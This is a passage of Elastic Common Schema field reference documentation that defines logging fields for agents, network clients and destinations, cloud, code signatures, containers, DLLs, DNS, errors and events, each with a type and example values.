+*`message`*:: ++ +-- +For log events the message field contains the log message, optimized for viewing in a log viewer. +For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. +If multiple messages exist, they can be combined into one message. + +type: text + +example: Hello World + +-- + +*`tags`*:: ++ +-- +List of keywords used to tag each event. + +type: keyword + +example: ["production", "env2"] + +-- + +[float] +=== agent + +The agent fields contain the data about the software entity, if any, that collects, detects, or observes events on a host, or takes measurements on a host. +Examples include Beats. Agents may also run on observers. ECS agent.* fields shall be populated with details of the agent running on the host or observer where the event happened or the measurement was taken. + + +*`agent.build.original`*:: ++ +-- +Extended build information for the agent. +This field is intended to contain any build information that a data source may provide, no specific formatting is required. + +type: keyword + +example: metricbeat version 7.6.0 (amd64), libbeat 7.6.0 [6a23e8f8f30f5001ba344e4e54d8d9cb82cb107c built 2020-02-05 23:10:10 +0000 UTC] + +-- + +*`agent.ephemeral_id`*:: ++ +-- +Ephemeral identifier of this agent (if one exists). +This id normally changes across restarts, but `agent.id` does not. + +type: keyword + +example: 8a4f500f + +-- + +*`agent.id`*:: ++ +-- +Unique identifier of this agent (if one exists). +Example: For Beats this would be beat.id. + +type: keyword + +example: 8a4f500d + +-- + +*`agent.name`*:: ++ +-- +Custom name of the agent. +This is a name that can be given to an agent. This can be helpful if for example two Filebeat instances are running on the same host but a human readable separation is needed on which Filebeat instance data is coming from. +If no name is given, the name is often left empty. + +type: keyword + +example: foo + +-- + +*`agent.type`*:: ++ +-- +Type of the agent. +The agent type always stays the same and should be given by the agent used. In case of Filebeat the agent would always be Filebeat also if two Filebeat instances are run on the same machine. + +type: keyword + +example: filebeat + +-- + +*`agent.version`*:: ++ +-- +Version of the agent. + +type: keyword + +example: 6.0.0-rc2 + +-- + +[float] +=== as + +An autonomous system (AS) is a collection of connected Internet Protocol (IP) routing prefixes under the control of one or more network operators on behalf of a single administrative entity or domain that presents a common, clearly defined routing policy to the internet. + + +*`as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`as.organization.name.text`*:: ++ +-- +type: text + +-- + +[float] +=== client + +A client is defined as the initiator of a network connection for events regarding sessions, connections, or bidirectional flow records. +For TCP events, the client is the initiator of the TCP connection that sends the SYN packet(s). For other protocols, the client is generally the initiator or requestor in the network transaction. Some systems use the term "originator" to refer the client in TCP connections. The client fields describe details about the system acting as the client in the network event. Client fields are usually populated in conjunction with server fields. Client fields are generally not populated for packet-level events. +Client / server representations can add semantic context to an exchange, which is helpful to visualize the data in certain situations. If your context falls in that category, you should still ensure that source and destination are filled appropriately. + + +*`client.address`*:: ++ +-- +Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. +Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`client.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`client.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`client.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`client.bytes`*:: ++ +-- +Bytes sent from the client to the server. + +type: long + +example: 184 + +format: bytes + +-- + +*`client.domain`*:: ++ +-- +Client domain. + +type: keyword + +-- + +*`client.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`client.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`client.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`client.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`client.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`client.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`client.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`client.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`client.ip`*:: ++ +-- +IP address of the client (IPv4 or IPv6). + +type: ip + +-- + +*`client.mac`*:: ++ +-- +MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`client.nat.ip`*:: ++ +-- +Translated IP of source based NAT sessions (e.g. internal client to internet). +Typically connections traversing load balancers, firewalls, or routers. + +type: ip + +-- + +*`client.nat.port`*:: ++ +-- +Translated port of source based NAT sessions (e.g. internal client to internet). +Typically connections traversing load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`client.packets`*:: ++ +-- +Packets sent from the client to the server. + +type: long + +example: 12 + +-- + +*`client.port`*:: ++ +-- +Port of the client. + +type: long + +format: string + +-- + +*`client.registered_domain`*:: ++ +-- +The highest registered client domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`client.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`client.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`client.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`client.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`client.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`client.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`client.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`client.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`client.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`client.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`client.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`client.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`client.user.name.text`*:: ++ +-- +type: text + +-- + +*`client.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== cloud + +Fields related to the cloud or infrastructure the events are coming from. + + +*`cloud.account.id`*:: ++ +-- +The cloud account or organization id used to identify different entities in a multi-tenant environment. +Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. + +type: keyword + +example: 666777888999 + +-- + +*`cloud.account.name`*:: ++ +-- +The cloud account name or alias used to identify different entities in a multi-tenant environment. +Examples: AWS account name, Google Cloud ORG display name. + +type: keyword + +example: elastic-dev + +-- + +*`cloud.availability_zone`*:: ++ +-- +Availability zone in which this host is running. + +type: keyword + +example: us-east-1c + +-- + +*`cloud.instance.id`*:: ++ +-- +Instance ID of the host machine. + +type: keyword + +example: i-1234567890abcdef0 + +-- + +*`cloud.instance.name`*:: ++ +-- +Instance name of the host machine. + +type: keyword + +-- + +*`cloud.machine.type`*:: ++ +-- +Machine type of the host machine. + +type: keyword + +example: t2.medium + +-- + +*`cloud.project.id`*:: ++ +-- +The cloud project identifier. +Examples: Google Cloud Project id, Azure Project id. + +type: keyword + +example: my-project + +-- + +*`cloud.project.name`*:: ++ +-- +The cloud project name. +Examples: Google Cloud Project name, Azure Project name. + +type: keyword + +example: my project + +-- + +*`cloud.provider`*:: ++ +-- +Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + +type: keyword + +example: aws + +-- + +*`cloud.region`*:: ++ +-- +Region in which this host is running. + +type: keyword + +example: us-east-1 + +-- + +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + +[float] +=== code_signature + +These fields contain information about binary code signatures. + + +*`code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +[float] +=== container + +Container fields are used for meta information about the specific container that is the source of information. +These fields help correlate data based containers from any runtime. + + +*`container.id`*:: ++ +-- +Unique container id. + +type: keyword + +-- + +*`container.image.name`*:: ++ +-- +Name of the image the container was built on. + +type: keyword + +-- + +*`container.image.tag`*:: ++ +-- +Container image tags. + +type: keyword + +-- + +*`container.labels`*:: ++ +-- +Image labels. + +type: object + +-- + +*`container.name`*:: ++ +-- +Container name. + +type: keyword + +-- + +*`container.runtime`*:: ++ +-- +Runtime managing this container. + +type: keyword + +example: docker + +-- + +[float] +=== destination + +Destination fields capture details about the receiver of a network exchange/packet. These fields are populated from a network event, packet, or other event containing details of a network transaction. +Destination fields are usually populated in conjunction with source fields. The source and destination fields are considered the baseline and should always be filled if an event contains source and destination details from a network transaction. If the event also contains identification of the client and server roles, then the client and server fields should also be populated. + + +*`destination.address`*:: ++ +-- +Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. +Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`destination.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`destination.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`destination.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`destination.bytes`*:: ++ +-- +Bytes sent from the destination to the source. + +type: long + +example: 184 + +format: bytes + +-- + +*`destination.domain`*:: ++ +-- +Destination domain. + +type: keyword + +-- + +*`destination.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`destination.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`destination.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`destination.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`destination.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`destination.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`destination.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`destination.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`destination.ip`*:: ++ +-- +IP address of the destination (IPv4 or IPv6). + +type: ip + +-- + +*`destination.mac`*:: ++ +-- +MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`destination.nat.ip`*:: ++ +-- +Translated ip of destination based NAT sessions (e.g. internet to private DMZ) +Typically used with load balancers, firewalls, or routers. + +type: ip + +-- + +*`destination.nat.port`*:: ++ +-- +Port the source session is translated to by NAT Device. +Typically used with load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`destination.packets`*:: ++ +-- +Packets sent from the destination to the source. + +type: long + +example: 12 + +-- + +*`destination.port`*:: ++ +-- +Port of the destination. + +type: long + +format: string + +-- + +*`destination.registered_domain`*:: ++ +-- +The highest registered destination domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`destination.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`destination.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`destination.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`destination.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`destination.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`destination.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`destination.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`destination.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`destination.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`destination.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`destination.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`destination.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`destination.user.name.text`*:: ++ +-- +type: text + +-- + +*`destination.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== dll + +These fields contain information about code libraries dynamically loaded into processes. + +Many operating systems refer to "shared code libraries" with different names, but this field set refers to all of the following: +* Dynamic-link library (`.dll`) commonly used on Windows +* Shared Object (`.so`) commonly used on Unix-like operating systems +* Dynamic library (`.dylib`) commonly used on macOS + + +*`dll.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`dll.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`dll.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`dll.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`dll.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`dll.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`dll.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`dll.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`dll.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`dll.name`*:: ++ +-- +Name of the library. +This generally maps to the name of the file on disk. + +type: keyword + +example: kernel32.dll + +-- + +*`dll.path`*:: ++ +-- +Full file path of the library. + +type: keyword + +example: C:\Windows\System32\kernel32.dll + +-- + +*`dll.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`dll.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`dll.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`dll.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`dll.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`dll.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`dll.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +[float] +=== dns + +Fields describing DNS queries and answers. +DNS events should either represent a single DNS query prior to getting answers (`dns.type:query`) or they should represent a full exchange and contain the query details as well as all of the answers that were provided for this query (`dns.type:answer`). + + +*`dns.answers`*:: ++ +-- +An array containing an object for each answer section returned by the server. +The main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines. +Not all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields. + +type: object + +-- + +*`dns.answers.class`*:: ++ +-- +The class of DNS data contained in this resource record. + +type: keyword + +example: IN + +-- + +*`dns.answers.data`*:: ++ +-- +The data describing the resource. +The meaning of this data depends on the type and class of the resource record. + +type: keyword + +example: 10.10.10.10 + +-- + +*`dns.answers.name`*:: ++ +-- +The domain name to which this resource record pertains. +If a chain of CNAME is being resolved, each answer's `name` should be the one that corresponds with the answer's `data`. It should not simply be the original `question.name` repeated. + +type: keyword + +example: www.example.com + +-- + +*`dns.answers.ttl`*:: ++ +-- +The time interval in seconds that this resource record may be cached before it should be discarded. Zero values mean that the data should not be cached. + +type: long + +example: 180 + +-- + +*`dns.answers.type`*:: ++ +-- +The type of data contained in this resource record. + +type: keyword + +example: CNAME + +-- + +*`dns.header_flags`*:: ++ +-- +Array of 2 letter DNS header flags. +Expected values are: AA, TC, RD, RA, AD, CD, DO. + +type: keyword + +example: ["RD", "RA"] + +-- + +*`dns.id`*:: ++ +-- +The DNS packet identifier assigned by the program that generated the query. The identifier is copied to the response. + +type: keyword + +example: 62111 + +-- + +*`dns.op_code`*:: ++ +-- +The DNS operation code that specifies the kind of query in the message. This value is set by the originator of a query and copied into the response. + +type: keyword + +example: QUERY + +-- + +*`dns.question.class`*:: ++ +-- +The class of records being queried. + +type: keyword + +example: IN + +-- + +*`dns.question.name`*:: ++ +-- +The name being queried. +If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. + +type: keyword + +example: www.example.com + +-- + +*`dns.question.registered_domain`*:: ++ +-- +The highest registered domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`dns.question.subdomain`*:: ++ +-- +The subdomain is all of the labels under the registered_domain. +If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: www + +-- + +*`dns.question.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`dns.question.type`*:: ++ +-- +The type of record being queried. + +type: keyword + +example: AAAA + +-- + +*`dns.resolved_ip`*:: ++ +-- +Array containing all IPs seen in `answers.data`. +The `answers` array can be difficult to use, because of the variety of data formats it can contain. Extracting all IP addresses seen in there to `dns.resolved_ip` makes it possible to index them as IP addresses, and makes them easier to visualize and query for. + +type: ip + +example: ["10.10.10.10", "10.10.10.11"] + +-- + +*`dns.response_code`*:: ++ +-- +The DNS response code. + +type: keyword + +example: NOERROR + +-- + +*`dns.type`*:: ++ +-- +The type of DNS event captured, query or answer. +If your source of DNS events only gives you DNS queries, you should only create dns events of type `dns.type:query`. +If your source of DNS events gives you answers as well, you should create one event per query (optionally as soon as the query is seen). And a second event containing all query details as well as an array of answers. + +type: keyword + +example: answer + +-- + +[float] +=== ecs + +Meta-information specific to ECS. + + +*`ecs.version`*:: ++ +-- +ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. +When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. + +type: keyword + +example: 1.0.0 + +required: True + +-- + +[float] +=== error + +These fields can represent errors of any kind. +Use them for errors that happen while fetching events or in cases where the event itself contains an error. + + +*`error.code`*:: ++ +-- +Error code describing the error. + +type: keyword + +-- + +*`error.id`*:: ++ +-- +Unique identifier for the error. + +type: keyword + +-- + +*`error.message`*:: ++ +-- +Error message. + +type: text + +-- + +*`error.stack_trace`*:: ++ +-- +The stack trace of this error in plain text. + +type: keyword + +Field is not indexed. + +-- + +*`error.stack_trace.text`*:: ++ +-- +type: text + +-- + +*`error.type`*:: ++ +-- +The type of the error, for example the class name of the exception. + +type: keyword + +example: java.lang.NullPointerException + +-- + +[float] +=== event + +The event fields are used for context information about the log or metric event itself. +A log is defined as an event containing details of something that happened. Log events must include the time at which the thing happened. Examples of log events include a process starting on a host, a network packet being sent from a source to a destination, or a network connection between a client and a server being initiated or closed. A metric is defined as an event containing one or more numerical measurements and the time at which the measurement was taken. Examples of metric events include memory pressure measured on a host and device temperature. See the `event.kind` definition in this section for additional details about metric and state events. + + +*`event.action`*:: ++ +-- +The action captured by the event. +This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. + +type: keyword + +example: user-password-change + +-- + +*`event.category`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. +`event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. +This field is an array. This will allow proper categorization of some events that fall in multiple categories. + +type: keyword + +example: authentication + +-- + +*`event.code`*:: ++ +-- +Identification code for this event, if one exists. +Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. + +type: keyword + +example: 4648 + +-- + +*`event.created`*:: ++ +-- +event.created contains the date/time when the event was first read by an agent, or by your pipeline. +This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. +In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. +In case the two timestamps are identical, @timestamp should be used. + +type: date + +example: 2016-05-23T08:05:34.857Z + +-- + +*`event.dataset`*:: ++ +-- +Name of the dataset. +If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. +It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. + +type: keyword + +example: apache.access + +-- + +*`event.duration`*:: ++ +-- +Duration of the event in nanoseconds. +If event.start and event.end are known this value should be the difference between the end and start time. + +type: long + +format: duration + +-- + +*`event.end`*:: ++ +-- +event.end contains the date when the event ended or when the activity was last observed. + +type: date + +-- + +*`event.hash`*:: ++ +-- +Hash (perhaps logstash fingerprint) of raw field to be able to demonstrate log integrity. + +type: keyword + +example: 123456789012345678901234567890ABCD + +-- + +*`event.id`*:: ++ +-- +Unique ID to describe the event. + +type: keyword + +example: 8a4f500d + +-- + +*`event.ingested`*:: ++ +-- +Timestamp when an event arrived in the central data store. +This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. +In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` < `event.created` < `event.ingested`. + +type: date + +example: 2016-05-23T08:05:35.101Z + +-- + +*`event.kind`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. +`event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. +The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data coming in at a regular interval or not. + +type: keyword + +example: alert + +-- + +*`event.module`*:: ++ +-- +Name of the module this data is coming from. +If your monitoring agent supports the concept of modules or plugins to process events of a given source (e.g. Apache logs), `event.module` should contain the name of this module. + +type: keyword + +example: apache + +-- + +*`event.original`*:: ++ +-- +Raw text message of entire event. Used to demonstrate log integrity. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. + +type: keyword + +example: Sep 19 08:26:10 host CEF:0|Security| threatmanager|1.0|100| worm successfully stopped|10|src=10.0.0.1 dst=2.1.2.2spt=1232 + +Field is not indexed. + +-- + +*`event.outcome`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. +`event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. +Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. +Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. +Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. + +type: keyword + +example: success + +-- + +*`event.provider`*:: ++ +-- +Source of the event. +Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). + +type: keyword + +example: kernel + +-- + +*`event.reason`*:: ++ +-- +Reason why this event happened, according to the source. +This describes the why of a particular action or outcome captured in the event. Where `event.action` captures the action from the event, `event.reason` describes why that action was taken. For example, a web proxy with an `event.action` which denied the request may also populate `event.reason` with the reason why (e.g. `blocked site`). + +type: keyword + +example: Terminated an unexpected process + +-- + +*`event.reference`*:: ++ +-- +Reference URL linking to additional information about this event. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. + +type: keyword + +example: https://system.example.com/event/#0001234 + +-- + +*`event.risk_score`*:: ++ +-- +Risk score or priority of the event (e.g. security solutions). Use your system's original value here. + 